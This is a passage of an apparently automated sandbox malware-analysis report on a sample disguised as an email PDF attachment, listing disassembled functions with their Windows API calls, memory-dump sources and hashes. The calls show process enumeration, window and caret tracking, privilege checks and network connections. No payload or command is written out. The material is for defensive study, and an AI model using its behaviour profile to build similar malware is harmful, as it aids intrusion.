                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: a5ac0c5bd1fa2a8943b927cb3a8205525d5eb698e0911df2b8adcbe90d536157
                                                                                                          • Instruction ID: 5a5d0d4ab1973f6ac08a880323e7283af4411aef95647427b97cd03f7dcd1b48
                                                                                                          • Opcode Fuzzy Hash: a5ac0c5bd1fa2a8943b927cb3a8205525d5eb698e0911df2b8adcbe90d536157
                                                                                                          • Instruction Fuzzy Hash: DD31D030A4024AFFDF21AF65CC48BAA7BB9FF41320F154069E824971A1E739E950DB90
                                                                                                          Function 007D4EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 007D4F02
                                                                                                            • Part of subcall function 007B3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007B365B
                                                                                                            • Part of subcall function 007B3641: GetCurrentThreadId.KERNEL32 ref: 007B3662
                                                                                                            • Part of subcall function 007B3641: AttachThreadInput.USER32(00000000,?,007B5005), ref: 007B3669
                                                                                                          • GetCaretPos.USER32(?), ref: 007D4F13
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 007D4F4E
                                                                                                          • GetForegroundWindow.USER32 ref: 007D4F54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759813231-0
                                                                                                          • Opcode ID: 8e70a59d7bf0caf99779b6d4bae54c4c9b9eda66320bb3a649e63d0135bf84f6
                                                                                                          • Instruction ID: a0800496bcf50be6e8c49bc1fe38c90a21e056ce5a3b8f14626c651a5f82ae23
                                                                                                          • Opcode Fuzzy Hash: 8e70a59d7bf0caf99779b6d4bae54c4c9b9eda66320bb3a649e63d0135bf84f6
                                                                                                          • Instruction Fuzzy Hash: 95312F71D00208EFDB00EFA5C8859EFB7F9EF84304F14406AE915E7241DA79AE458BA1
                                                                                                          Function 007B3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 007B3C7A
                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 007B3C88
                                                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 007B3CA8
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 007B3D52
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                          • String ID:
                                                                                                          • API String ID: 420147892-0
                                                                                                          • Opcode ID: e1de98b172fadde0ae164022b57c94321f714dddd0a093105f8c9f233ce18b4a
                                                                                                          • Instruction ID: 9c4a0aa63ddce259e58ab332cd7a3fdbd196f22670d81a4364ce791f900679e2
                                                                                                          • Opcode Fuzzy Hash: e1de98b172fadde0ae164022b57c94321f714dddd0a093105f8c9f233ce18b4a
                                                                                                          • Instruction Fuzzy Hash: A831A171108345DFD304EF50D885AEABBF8EF85354F40082DF982861A1EBB9AA49CB52
                                                                                                          Function 007DC498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • GetCursorPos.USER32(?), ref: 007DC4D2
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0078B9AB,?,?,?,?,?), ref: 007DC4E7
                                                                                                          • GetCursorPos.USER32(?), ref: 007DC534
                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0078B9AB,?,?,?), ref: 007DC56E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2864067406-0
                                                                                                          • Opcode ID: eb98870fa9755532612235c29e73ce8ca36dc2d67ed15846e2e4b8293c624967
                                                                                                          • Instruction ID: 28005b1f47b3114679b1af421fb5cb4aa3e9838560bca6b90f79af4a9d6d7e85
                                                                                                          • Opcode Fuzzy Hash: eb98870fa9755532612235c29e73ce8ca36dc2d67ed15846e2e4b8293c624967
                                                                                                          • Instruction Fuzzy Hash: 8F319335610058EFCB168F98D858EEA7BB9FF49310F148066F9068B361C739AD61DBA4
                                                                                                          Function 007A8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 007A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007A8121
                                                                                                            • Part of subcall function 007A810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007A812B
                                                                                                            • Part of subcall function 007A810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A813A
                                                                                                            • Part of subcall function 007A810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8141
                                                                                                            • Part of subcall function 007A810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007A8157
                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007A86A3
                                                                                                          • _memcmp.LIBCMT ref: 007A86C6
                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007A86FC
                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007A8703
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1592001646-0
                                                                                                          • Opcode ID: 4cbc26bf5686580fe4d23917283a0aee355204ca2eafdf04e3f96bd615fd10e6
                                                                                                          • Instruction ID: 6af1f2aa769126d1a81aff954dc5ee0326b6189fd6fa682a3ede09a338bef87f
                                                                                                          • Opcode Fuzzy Hash: 4cbc26bf5686580fe4d23917283a0aee355204ca2eafdf04e3f96bd615fd10e6
                                                                                                          • Instruction Fuzzy Hash: 4A21C132E01108EFEB00DFA4CA48BEEB7B8FF85304F148159E454A7242EB39AE05CB51
                                                                                                          Function 0077098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __setmode.LIBCMT ref: 007709AE
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7896,?,?,00000000), ref: 00755A2C
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7896,?,?,00000000,?,?), ref: 00755A50
                                                                                                          • _fprintf.LIBCMT ref: 007709E5
                                                                                                          • OutputDebugStringW.KERNEL32(?), ref: 007A5DBB
                                                                                                            • Part of subcall function 00774AAA: _flsall.LIBCMT ref: 00774AC3
                                                                                                          • __setmode.LIBCMT ref: 00770A1A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 521402451-0
                                                                                                          • Opcode ID: 94da5f355b693eda6448803c93a990a904e56c9445a7d4d959d38966d357269f
                                                                                                          • Instruction ID: 1c00f58d17bbbc7571d6158c488935b5eeb873527476474009741bb8e9f8abf3
                                                                                                          • Opcode Fuzzy Hash: 94da5f355b693eda6448803c93a990a904e56c9445a7d4d959d38966d357269f
                                                                                                          • Instruction Fuzzy Hash: F3115732604208EFCF04B3B49C4E9FE77A8AF81360F14C155F20853182EF6C584687E5
                                                                                                          Function 007C1767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C17A3
                                                                                                            • Part of subcall function 007C182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 007C184C
                                                                                                            • Part of subcall function 007C182D: InternetCloseHandle.WININET(00000000), ref: 007C18E9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$CloseConnectHandleOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1463438336-0
                                                                                                          • Opcode ID: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                                                                                                          • Instruction ID: b6e201843021189f7e090f68ac577278fa3616926fbfab92609f28cab35e35d7
                                                                                                          • Opcode Fuzzy Hash: 5b2f448c5e6f2fce67a127b17e10655644abf39a0430c52b0af842e4bf44e176
                                                                                                          • Instruction Fuzzy Hash: D121F331204601BFEB129F60CC00FBABBE9FF4A720F54403EFA0596652DB79D811A7A0
                                                                                                          Function 007B3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileAttributesW.KERNEL32(?,007DFAC0), ref: 007B3A64
                                                                                                          • GetLastError.KERNEL32 ref: 007B3A73
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 007B3A82
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007DFAC0), ref: 007B3ADF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 2267087916-0
                                                                                                          • Opcode ID: 34992053fc9bb9d1e8c51af990bfbf3db9f50bbcf8cd9f5dd82c2f23c399a25f
                                                                                                          • Instruction ID: 4c4b4d60daf77e0937787e32e90ebd80d3a0edd22ca2b0a25d60f5976a2f6e5b
                                                                                                          • Opcode Fuzzy Hash: 34992053fc9bb9d1e8c51af990bfbf3db9f50bbcf8cd9f5dd82c2f23c399a25f
                                                                                                          • Instruction Fuzzy Hash: DC219474508201DF8300EF28D8859EB77F8BF55364F248A1AF49AC72A1D7399A89CB42
                                                                                                          Function 007850E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _free.LIBCMT ref: 00785101
                                                                                                            • Part of subcall function 0077571C: __FF_MSGBANNER.LIBCMT ref: 00775733
                                                                                                            • Part of subcall function 0077571C: __NMSG_WRITE.LIBCMT ref: 0077573A
                                                                                                            • Part of subcall function 0077571C: RtlAllocateHeap.NTDLL(00E40000,00000000,00000001,00000000,?,?,?,00770DD3,?), ref: 0077575F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_free
                                                                                                          • String ID:
                                                                                                          • API String ID: 614378929-0
                                                                                                          • Opcode ID: b7909ef9359d8c0e2cdd557c802912aa88d96238d0425203439d247e2876aeeb
                                                                                                          • Instruction ID: e852cc39b4772ac44e7b1b3b16f200aa1f272e5735db6504f071a3b109860758
                                                                                                          • Opcode Fuzzy Hash: b7909ef9359d8c0e2cdd557c802912aa88d96238d0425203439d247e2876aeeb
                                                                                                          • Instruction Fuzzy Hash: D911A3B2D81A19EECF313F74EC4D75D3798AF043A1B20852AF909D6161DF3C89409791
                                                                                                          Function 007544A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _memset.LIBCMT ref: 007544CF
                                                                                                            • Part of subcall function 0075407C: _memset.LIBCMT ref: 007540FC
                                                                                                            • Part of subcall function 0075407C: _wcscpy.LIBCMT ref: 00754150
                                                                                                            • Part of subcall function 0075407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00754160
                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00754524
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00754533
                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0078D4B9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1378193009-0
                                                                                                          • Opcode ID: 16368f9f28662699065d64970db69471fc0b344eda723fb706c27aad63f651df
                                                                                                          • Instruction ID: 0852f47fbe2e396f7d1aa36092195c61b4789702eae6025697738badfa5c5c47
                                                                                                          • Opcode Fuzzy Hash: 16368f9f28662699065d64970db69471fc0b344eda723fb706c27aad63f651df
                                                                                                          • Instruction Fuzzy Hash: 2221D770944784AFE7329B249855BE6BBECAF05319F04409EEA9E56181D3B82D88CB51
                                                                                                          Function 007C6369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,007B7896,?,?,00000000), ref: 00755A2C
                                                                                                            • Part of subcall function 00755A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,007B7896,?,?,00000000,?,?), ref: 00755A50
                                                                                                          • gethostbyname.WSOCK32(?,?,?), ref: 007C6399
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 007C63A4
                                                                                                          • _memmove.LIBCMT ref: 007C63D1
                                                                                                          • inet_ntoa.WSOCK32(?), ref: 007C63DC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                          • String ID:
                                                                                                          • API String ID: 1504782959-0
                                                                                                          • Opcode ID: 78dd0c8cbc1e0f2d5d881c10aeeb883c66db0bb56e8fa8e0ddccf5c5d188f412
                                                                                                          • Instruction ID: e5f6f70b1a4ba3241fad9fd321651eaeb18aa44eda1929cb1eda45e42e9d71ec
                                                                                                          • Opcode Fuzzy Hash: 78dd0c8cbc1e0f2d5d881c10aeeb883c66db0bb56e8fa8e0ddccf5c5d188f412
                                                                                                          • Instruction Fuzzy Hash: 4A116371500109EFCB04FBA4DD9ADEE77B8AF04311B148169F906A7161DF78AE18DB61
                                                                                                          Function 007A8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 007A8B61
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A8B73
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A8B89
                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007A8BA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend
                                                                                                          • String ID:
                                                                                                          • API String ID: 3850602802-0
                                                                                                          • Opcode ID: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                                                                                                          • Instruction ID: 25e06593a71acdf2df187b67bfa14835d8d3044e44ad882922d0f2762dffbf56
                                                                                                          • Opcode Fuzzy Hash: b2ec43b8292275d7a6d680c9bb51f910e9258b5c544ca2b1e551a806265ba7e7
                                                                                                          • Instruction Fuzzy Hash: 4B111CB9901218FFDB11DF95CC85F9DBB74FB49710F204195E900B7290DA716E11DBA4
                                                                                                          Function 00751290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                                                                                                          • DefDlgProcW.USER32(?,00000020,?), ref: 007512D8
                                                                                                          • GetClientRect.USER32(?,?), ref: 0078B5FB
                                                                                                          • GetCursorPos.USER32(?), ref: 0078B605
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0078B610
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 4127811313-0
                                                                                                          • Opcode ID: d3acdecbd98d160438af1b4964add41353cb72295e0b19631b347865d43ae2f2
                                                                                                          • Instruction ID: 241a647ee487c18295fd31c2a2624cb91de990c4d885d66c61947e279a087fd3
                                                                                                          • Opcode Fuzzy Hash: d3acdecbd98d160438af1b4964add41353cb72295e0b19631b347865d43ae2f2
                                                                                                          • Instruction Fuzzy Hash: FB111935601019FBCB00DF94D889AFE77B8FB05302F404456EA02E7241C778AA55CBA9
                                                                                                          Function 007AD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007AD84D
                                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 007AD864
                                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 007AD879
                                                                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 007AD897
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 1352324309-0
                                                                                                          • Opcode ID: 6adb7cf8da36b0920e7f44a1ea61fb7b133c4c79f7db3687b55b2776561f18bb
                                                                                                          • Instruction ID: 1dac70d7a093233a8f2b3b25911a02b6695ec741c3ed988fc3f6f7753181bac0
                                                                                                          • Opcode Fuzzy Hash: 6adb7cf8da36b0920e7f44a1ea61fb7b133c4c79f7db3687b55b2776561f18bb
                                                                                                          • Instruction Fuzzy Hash: 1B1161B5606304DBE3308F50DD08F97BBBCEB41B10F10866AE517D6850D7BDE9499BA1
